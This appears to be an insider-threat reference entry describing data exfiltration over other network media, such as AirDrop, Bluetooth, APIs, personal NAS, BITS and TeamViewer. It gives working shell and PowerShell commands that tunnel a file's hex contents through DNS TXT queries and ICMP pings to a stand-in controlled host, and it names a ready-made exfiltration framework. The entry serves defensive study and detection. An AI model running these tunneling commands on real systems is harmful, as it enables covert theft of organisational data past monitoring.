Exfiltration via Other Network Medium

A subject exfiltrates files using AirDrop as the transportation medium.

A subject may exfiltrate organizational data through direct interaction with application programming interfaces (APIs), leveraging HTTP/S-based service endpoints to transmit sensitive information outside of the organization’s controlled environment. This method typically involves programmatic data transfer using scripts, command-line tools, or software development kits (SDKs), rather than user-facing web interfaces.

In this infringement method, the subject authenticates to an external or unauthorized internal API using credentials such as API keys, OAuth tokens, or session tokens, and submits data via structured requests (e.g., POST, PUT). These APIs may belong to legitimate third-party services (e.g., cloud platforms, SaaS applications) or attacker-controlled infrastructure designed to receive and store exfiltrated data.

Unlike platform-driven exfiltration (e.g., uploading files via a web interface), API-based exfiltration is typically automated, scalable, and capable of operating without generating browser artifacts. This allows the subject to transfer large volumes of data, segment payloads across multiple requests, or embed exfiltration within otherwise legitimate application traffic.

This technique is particularly effective in environments where API traffic is common and trusted, and where inspection of request payloads, headers, or authentication patterns is limited.

A subject exfiltrates files using Bluetooth as the transportation medium.

A subject exfiltrates data using an organization-owned device (such as a laptop) by copying the data from the device to a personal Network Attached Storage (NAS) device, which is attached to a network outside of the control of the organization, such as a home network. Later, using a personal device, the subject accesses the NAS to retrieve the exfiltrated data.

A subject exfiltrates data from an organization by encapsulating or hiding it within an otherwise legitimate protocol. This technique allows the subject to covertly transfer data, evading detection by standard security monitoring tools. Commonly used protocols, such as DNS and ICMP, are often leveraged to secretly transmit data to an external destination.

DNS Tunneling (Linux)
A simple example of how DNS tunneling might be achieved with 'Living off the Land' binaries (LoLBins) in Linux:
 

Prerequisites:

• A domain the subject controls or can use for DNS queries.
• A DNS server to receive and decode the DNS queries.

Steps:

1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:

xxd -p secret.txt > secret.txt.hex
 

2. The subject splits the hexdump into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):

split -b 32 secret.txt.hex hexpart_

3. The subject uses dig to send the data in DNS TXT queries. Looping through the split files and sending each chunk as the subdomain of example.com in a TXT record query:

for part in hexpart_*; do
   h=$(cat $part)
   dig txt $h.example.com
done

On the target DNS server that they control, the subject captures the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.

DNS Tunneling (Windows)
A simple example of how DNS tunneling might be achieved with PowerShell in Windows:

Prerequisites:

• A the subject you controls.
  A DNS server or a script on the subjects server to capture and decode the DNS queries.

Steps:
1. The subject converts the sensitive file to hex:

$filePath = "C:\path\to\your\secret.txt"
$hexContent = [System.BitConverter]::ToString([System.IO.File]::ReadAllBytes($filePath)) -replace '-', ''

2. The subject splits the hex data into manageable chunks that can fit into DNS query labels (each label can be up to 63 characters, but it’s often safe to use a smaller size, such as 32 characters):

$chunkSize = 32
$chunks = $hexContent -split "(.{$chunkSize})" | Where-Object { $_ -ne "" }

3. The subject sends the data in DNS TXT queries. Looping through the hex data chunks and sending each chunk as the subdomain of example.com in a TXT record query:

$domain = "example.com"

foreach ($chunk in $chunks) {
   $query = "$chunk.$domain"
   Resolve-DnsName -Name $query -Type TXT
}

The subject will capture the incoming DNS TXT record queries on the receiving DNS server and decode the reassembled hex data from the subdomain of the query.

ICMP Tunneling (Linux)
A simple example of how ICMP tunneling might be achieved with 'Living off the Land' binaries (LOLBins) in Linux:
 

Prerequisites:

• The subject has access to a server that can receive and process ICMP packets.
• The subject has root privileges on both client and server machines (as ICMP usually requires elevated permissions).

Steps:

1. The subject uses xxd to create a hex dump of the file they wish to exfiltrate. For example, if the file is secret.txt:

xxd -p secret.txt > secret.txt.hex

2. The subject splits the hexdump into manageable chunks. ICMP packets have a payload size limit, so it’s common to use small chunks. The following command will split the hex data into 32-byte chunks:
 

split -b 32 secret.txt.hex hexpart_

3. The subject uses ping to send the data in ICMP echo request packets. Loop through the split files and send each chunk as part of the ICMP payload:

DESTINATION_IP="subject_server_ip"
for part in hexpart_*; do
   h=$(cat $part)
   ping -c 1 -p "$h" $DESTINATION_IP
done

The subject will capture the incoming ICMP packets on the destination server, extract the data from the packets and decode the reassembled the hex data.

A subject may employ a Python-based listening service to exfiltrate organizational data, typically as part of a self-initiated or premeditated breach. Python’s accessibility and versatility make it a powerful tool for creating custom scripts capable of transmitting sensitive data to external or unauthorized internal systems.

In this infringement method, the subject configures a Python script—often hosted externally or on a covert internal system—to listen for incoming connections. A complementary script, running within the organization’s network (such as on a corporate laptop), transmits sensitive files or data streams to the listening service using common protocols such as HTTP or TCP, or via more covert channels including DNS tunneling, ICMP, or steganographic methods. Publicly available tools such as PyExfil can facilitate these operations, offering modular capabilities for exfiltrating data across multiple vectors.

Examples of Use:

• A user sets up a lightweight Python HTTP listener on a personal VPS and writes a Python script to send confidential client records over HTTPS.
• A developer leverages a custom Python socket script to transfer log data to a system outside the organization's network, circumventing monitoring tools.
• An insider adapts an open-source exfiltration framework like PyExfil to send data out via DNS queries to a registered domain.

Detection Considerations:

• Monitor for local Python processes opening network sockets or binding to uncommon ports.
• Generate alerts on outbound connections to unfamiliar IP addresses or those exhibiting anomalous traffic patterns.
• Utilize endpoint detection and response (EDR) solutions to flag scripting activity involving file access and external communications.
• Inspect Unified Logs, network flow data, and system audit trails for signs of unauthorized data movement or execution of custom scripts.

A subject exfiltrates data outside of the organization's control using the built-in file transfer capabilities of software such as Teamviewer.

A subject may leverage the Windows Background Intelligent Transfer Service (BITS) to exfiltrate organizational data in a covert and resilient manner. BITS is a native Windows component designed to transfer files asynchronously over HTTP or SMB, typically used by system processes such as updates and patch delivery. Its trusted status, ability to throttle bandwidth, and support for job persistence make it an attractive mechanism for stealthy data exfiltration.

In this infringement method, the subject creates or modifies a BITS job, either via native utilities (e.g., bitsadmin, PowerShell cmdlets) or custom tooling, to upload sensitive files to an external endpoint under their control. Transfers may be disguised as legitimate background activity, leveraging standard ports and protocols to blend with normal system traffic.

BITS jobs can persist across reboots, retry on failure, and operate with minimal user interaction, allowing the subject to stage and gradually exfiltrate data over extended periods. In some cases, the subject may combine BITS with obfuscation techniques, such as renaming payloads, encrypting data prior to transfer, or using subject-controlled infrastructure that mimics legitimate services.

This technique is particularly effective in environments where outbound traffic is loosely controlled and where native Windows services are implicitly trusted, reducing the likelihood of immediate detection.

• Examples of Use
  A subject creates a BITS job using PowerShell to upload archived project files to an external HTTP server hosted on a personal VPS.
• A subject schedules a recurring BITS transfer that periodically sends collected documents to a remote endpoint, using low bandwidth to avoid triggering alerts.
• A subject modifies an existing BITS job to include additional file uploads to an attacker-controlled domain, blending activity with legitimate system update traffic.